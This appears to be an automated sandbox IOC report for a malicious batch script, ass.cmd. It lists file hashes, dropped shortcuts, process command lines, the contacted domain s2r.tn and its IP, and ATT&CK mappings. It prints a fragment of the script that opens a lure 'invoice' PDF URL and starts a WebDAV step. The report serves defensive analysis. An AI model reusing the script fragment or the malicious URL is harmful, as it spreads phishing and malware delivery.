Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

ass.cmd

DOS batch file, ASCII text, with CRLF line terminators

initial sample

Details

Filetype:	DOS batch file, ASCII text, with CRLF line terminators
Entropy:	5.204871194364017
Filename:	ass.cmd
Filesize:	2135
MD5:	25b8c6047b4ade5de627c34e01057d61
SHA1:	a90b86bd9933349484e40a19500e700abc5e5e75
SHA256:	1674fb99e589704d0ac50bd2899e3f10a3f623a85266c66599ab0288699b6b63
SHA512:	1a1ddcef0fda9d32ad85d891603985a5b5eac8f34da0a588e0f20e44ac3be22d5816da86e00af55519b6d692b8d57c052c82b694a4e269e3240232b0f395cca5
SSDEEP:	48:NrbiwN8fPf2pQES8o91E1J+D3PRE10EE6Y51n4nTjko3PRb4wEi4R7h:NbefPf5ESTLE1QTRE17E6C4n/kERUnzn
Preview:	@echo off..setlocal....REM Open PDF file (adjust URL as needed)..echo Opening PDF file.....start "" "https://s2r.tn/cgi/INVOICERVSHA.pdf"..timeout /t 5 >nul REM Wait for PDF to open (adjust timeout as needed)....REM Set WebDAV source path..set webdavSour

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:44:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide

dropped

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Category:	dropped
Dump:	Docs.lnk.2.dr
ID:	dr_5
Target ID:	2
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:44:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Entropy:	3.9873132784942418
Encrypted:	false
Ssdeep:	48:8uXXdqTWaqHiidAKZdA19ehwiZUklqehly+3:8S4DLqy
Size:	2677
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Stores files to the Windows start menu directory	Boot Survival	Registry Run Keys / Startup Folder

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

dropped

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Category:	dropped
Dump:	Gmail.lnk.2.dr
ID:	dr_3
Target ID:	2
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:44:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Entropy:	4.00412624289041
Encrypted:	false
Ssdeep:	48:8iXdqTWaqHiidAKZdA1weh/iZUkAQkqehay+2:8i4D59Qny
Size:	2679
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Stores files to the Windows start menu directory	Boot Survival	Registry Run Keys / Startup Folder

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide

dropped

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Category:	dropped
Dump:	Google Drive.lnk.2.dr
ID:	dr_0
Target ID:	2
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Entropy:	4.013731057934256
Encrypted:	false
Ssdeep:	48:8xDdqTWasHiidAKZdA14tseh7sFiZUkmgqeh7sMy+BX:8xkD3nmy
Size:	2693
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Stores files to the Windows start menu directory	Boot Survival	Registry Run Keys / Startup Folder

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

dropped

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Category:	dropped
Dump:	Sheets.lnk.2.dr
ID:	dr_2
Target ID:	2
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:44:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Entropy:	4.000622588940427
Encrypted:	false
Ssdeep:	48:86XdqTWaqHiidAKZdA1vehDiZUkwqehey+R:864Daky
Size:	2681
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Stores files to the Windows start menu directory	Boot Survival	Registry Run Keys / Startup Folder

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

dropped

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Category:	dropped
Dump:	Slides.lnk.2.dr
ID:	dr_4
Target ID:	2
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:44:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Entropy:	3.991371190356649
Encrypted:	false
Ssdeep:	48:8CXdqTWaqHiidAKZdA1hehBiZUk1W1qehoy+C:8C4Da9Iy
Size:	2681
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Stores files to the Windows start menu directory	Boot Survival	Registry Run Keys / Startup Folder

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

dropped

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Category:	dropped
Dump:	YouTube.lnk.2.dr
ID:	dr_1
Target ID:	2
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:44:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Entropy:	3.997850043949293
Encrypted:	false
Ssdeep:	48:82+XdqTWaqHiidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbmy+yT+:8R4DkT/TbxWOvTbmy7T
Size:	2683
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Stores files to the Windows start menu directory	Boot Survival	Registry Run Keys / Startup Folder

Chrome Cache Entry: 60

HTML document, ASCII text

downloaded

Details

File:	Chrome Cache Entry: 60
Category:	downloaded
Dump:	chromecache_60.6.dr
ID:	dr_8
Target ID:	6
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
Type:	HTML document, ASCII text
Entropy:	5.0572271090563765
Encrypted:	false
Ssdeep:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
Size:	315
Whitelisted:	false
Reputation:	high

Chrome Cache Entry: 61

HTML document, ASCII text

downloaded

Details

File:	Chrome Cache Entry: 61
Category:	downloaded
Dump:	chromecache_61.6.dr
ID:	dr_9
Target ID:	6
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
Type:	HTML document, ASCII text
Entropy:	5.0572271090563765
Encrypted:	false
Ssdeep:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
Size:	315
Whitelisted:	false
Reputation:	timeout

Processes

Path

Cmdline

Malicious

C:\Windows\System32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ass.cmd" "

Details

Is windows:	true
Is dropped:	false
PID:	7136
Target ID:	0
Parent PID:	1028
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ass.cmd" "
Size:	289792
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
Time:	07:44:39
Date:	26/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff7dc5b0000
Modulesize:	421888
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	1264
Target ID:	1
Parent PID:	7136
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	07:44:39
Date:	26/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6d64d0000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf

Details

Is windows:	true
Is dropped:	false
PID:	6148
Target ID:	2
Parent PID:	7136
Name:	chrome.exe
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf
Size:	3242272
MD5:	45DE480806D1B5D462A7DDE4DCEFC4E4
Time:	07:44:40
Date:	26/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff715980000
Modulesize:	3325952
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Spawns processes	System Summary	Process Injection

C:\Windows\System32\timeout.exe

timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)

Details

Is windows:	true
Is dropped:	false
PID:	6668
Target ID:	3
Parent PID:	7136
Name:	timeout.exe
Path:	C:\Windows\System32\timeout.exe
Commandline:	timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
Size:	32768
MD5:	100065E21CFBBDE57CBA2838921F84D6
Time:	07:44:40
Date:	26/10/2024
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6d1180000
Modulesize:	53248
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Spawns processes	System Summary	Process Injection

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2612 --field-trial-handle=2476,i,8966807977756366984,10787643542951515386,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8

Details

Is windows:	true
Is dropped:	false
PID:	7180
Target ID:	6
Parent PID:	6148
Name:	chrome.exe
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2612 --field-trial-handle=2476,i,8966807977756366984,10787643542951515386,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Size:	3242272
MD5:	45DE480806D1B5D462A7DDE4DCEFC4E4
Time:	07:44:40
Date:	26/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff715980000
Modulesize:	3325952
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

https://s2r.tn/cgi/INVOICERVSHA.pdf

Details

Name:	https://s2r.tn/cgi/INVOICERVSHA.pdf
TargetID:	0
From Memory:	false
Current Path:	C:\Windows\System32\cmd.exe
Source:	browser

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
HTML page is missing a favicon	Phishing
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

https://s2r.tn/favicon.ico

70.38.21.234

Domains

Name

Malicious

s2r.tn

70.38.21.234

Details

Name:	s2r.tn
IP:	70.38.21.234
TargetID:	6
Current Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

www.google.com

142.250.185.228

Details

Name:	www.google.com
IP:	142.250.185.228
TargetID:	6
Current Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

IPs

Domain

Country

Malicious

142.250.185.228

www.google.com

United States

70.38.21.234

s2r.tn

Canada

239.255.255.250

unknown

Reserved

192.168.2.9

unknown

192.168.2.5

unknown

Memdumps

Base Address

Regiontype

Protect

Malicious

9CE6BEF000

stack

page read and write

1B9CA820000

heap

page read and write

1B9CC1C5000

heap

page read and write

1B9CC100000

heap

page read and write

1B9CA740000

heap

page read and write

9CE6B6C000

stack

page read and write

1B9CA858000

heap

page read and write

9CE6E7F000

stack

page read and write

1B9CA850000

heap

page read and write

1B9CC1C0000

heap

page read and write

DOM / HTML

URL

Malicious

https://s2r.tn/cgi/INVOICERVSHA.pdf

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
ass.cmd

Files

Processes

URLs

Domains

IPs

Memdumps

DOM / HTML

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportass.cmd

Files

Processes

URLs

Domains

IPs

Memdumps

DOM / HTML

IOC Report
ass.cmd